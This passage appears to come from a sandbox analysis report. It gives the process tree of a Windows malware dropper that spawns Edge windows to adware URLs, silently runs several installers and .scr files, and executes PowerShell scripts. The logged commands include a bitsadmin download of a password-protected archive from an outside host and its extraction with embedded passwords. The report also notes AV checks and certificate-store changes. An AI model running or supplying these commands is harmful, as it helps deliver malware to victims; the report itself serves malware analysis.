            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5640 /prefetch:8
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5640 /prefetch:8
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4868 /prefetch:2
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5440 /prefetch:8
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
                - Suspicious use of NtCreateProcessExOtherParentProcess
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3972 /prefetch:8
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2860 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6288 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5860 /prefetch:8
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3136 /prefetch:8
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6776 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6044 /prefetch:8
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6292 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6304 /prefetch:8
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6856 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:1
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
          [depth 9] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e4854718
          [depth 9] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e4854718
          [depth 9] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e4854718
          [depth 9] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e4854718
          [depth 9] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e4854718
          [depth 9] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
            [depth 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e4854718
        [depth 8] C:\Users\Admin\AppData\Local\Temp\64-adea2-d79-4c2a6-51de532b86842\Vonacoreqa.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\64-adea2-d79-4c2a6-51de532b86842\Vonacoreqa.exe"
          [depth 9] C:\Windows\System32\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ol2ric5.d2d\installer.exe /qn CAMPAIGN="654" & exit
            [depth 10] C:\Users\Admin\AppData\Local\Temp\4ol2ric5.d2d\installer.exe
                Command line: C:\Users\Admin\AppData\Local\Temp\4ol2ric5.d2d\installer.exe /qn CAMPAIGN="654"
                - Loads dropped DLL
                - Enumerates connected drives
                - Modifies system certificate store
                - Suspicious use of FindShellTrayWindow
              [depth 11] C:\Windows\SysWOW64\msiexec.exe
                  Command line: "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\4ol2ric5.d2d\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\4ol2ric5.d2d\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633365428 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                  - Enumerates connected drives
          [depth 9] C:\Windows\System32\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ojxdrcab.0sx\any.exe & exit
            [depth 10] C:\Users\Admin\AppData\Local\Temp\ojxdrcab.0sx\any.exe
                Command line: C:\Users\Admin\AppData\Local\Temp\ojxdrcab.0sx\any.exe
          [depth 9] C:\Windows\System32\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qva1kxpe.3fm\DownFlSetup122.exe & exit
            [depth 10] C:\Users\Admin\AppData\Local\Temp\qva1kxpe.3fm\DownFlSetup122.exe
                Command line: C:\Users\Admin\AppData\Local\Temp\qva1kxpe.3fm\DownFlSetup122.exe
              [depth 11] C:\Users\Admin\AppData\Roaming\8273011.scr
                  Command line: "C:\Users\Admin\AppData\Roaming\8273011.scr" /S
                [depth 12] C:\Windows\System32\Conhost.exe
                    Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          [depth 9] C:\Windows\System32\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ioxsjw32.qyl\Browser4Download.exe & exit
            [depth 10] C:\Users\Admin\AppData\Local\Temp\ioxsjw32.qyl\Browser4Download.exe
                Command line: C:\Users\Admin\AppData\Local\Temp\ioxsjw32.qyl\Browser4Download.exe
              [depth 11] C:\Users\Admin\AppData\Roaming\2113420.scr
                  Command line: "C:\Users\Admin\AppData\Roaming\2113420.scr" /S
              [depth 11] C:\Users\Admin\AppData\Roaming\2785272.scr
                  Command line: "C:\Users\Admin\AppData\Roaming\2785272.scr" /S
                  - Suspicious behavior: SetClipboardViewer
          [depth 9] C:\Windows\System32\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tp1qep3v.2of\cust2.exe & exit
            [depth 10] C:\Users\Admin\AppData\Local\Temp\tp1qep3v.2of\cust2.exe
                Command line: C:\Users\Admin\AppData\Local\Temp\tp1qep3v.2of\cust2.exe
          [depth 9] C:\Windows\System32\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lkm4dn1w.kb1\autosubplayer.exe /S & exit
            [depth 10] C:\Windows\System32\Conhost.exe
                Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            [depth 10] C:\Users\Admin\AppData\Local\Temp\lkm4dn1w.kb1\autosubplayer.exe
                Command line: C:\Users\Admin\AppData\Local\Temp\lkm4dn1w.kb1\autosubplayer.exe /S
                - Loads dropped DLL
                - Drops file in Program Files directory
              [depth 11] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"
              [depth 11] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"
              [depth 11] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"
              [depth 11] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"
              [depth 11] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z11⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pPbRz4ETRZ9bWlRf -y x C:\zip.7z -o"C:\Program Files\temp_files\"11⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pnczkWtKvNiK8PYi -y x C:\zip.7z -o"C:\Program Files\temp_files\"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\SMBbvCSuKLI\SMBbvCSuKLI.dll" SMBbvCSuKLI11⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\SMBbvCSuKLI\SMBbvCSuKLI.dll" SMBbvCSuKLI12⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
